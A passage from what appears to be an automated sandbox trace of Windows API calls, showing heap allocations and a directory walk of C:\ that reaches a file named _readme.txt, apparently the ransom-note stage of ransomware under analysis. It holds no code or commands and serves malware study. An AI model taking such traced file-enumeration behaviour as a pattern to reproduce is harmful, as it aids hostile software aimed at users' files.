returned 0x332fde8 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.335] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.335] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.335] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0094.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0094.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301d0 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0094.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.337] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fa38 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0094.337] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25f00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x9ab25f00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9ab25f00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.337] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0094.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.338] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32d0958 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330798 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330540 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0094.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0094.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0094.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0094.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fa38 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b94968 | out: hHeap=0x630000) returned 1 [0094.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.339] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16dc280, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa16dc280, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa16dc280, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.339] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.339] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16dc280, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa16dc280, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa16dc280, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.339] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0094.339] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0094.342] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.342] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.343] HeapFree (in: 